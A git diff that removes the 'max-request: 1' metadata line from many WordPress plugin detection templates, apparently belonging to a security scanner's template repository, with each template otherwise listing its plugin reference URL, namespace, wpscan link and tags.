diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 254f916291..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 575c9ebe67..840c086fb9 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index 2409c6b370..a8eca7b056 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: - max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8881e23860..8e1cb46cf0 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 0bc823830f..c45ef4bf89 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index 7fbeea5917..a224d85727 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: - max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git 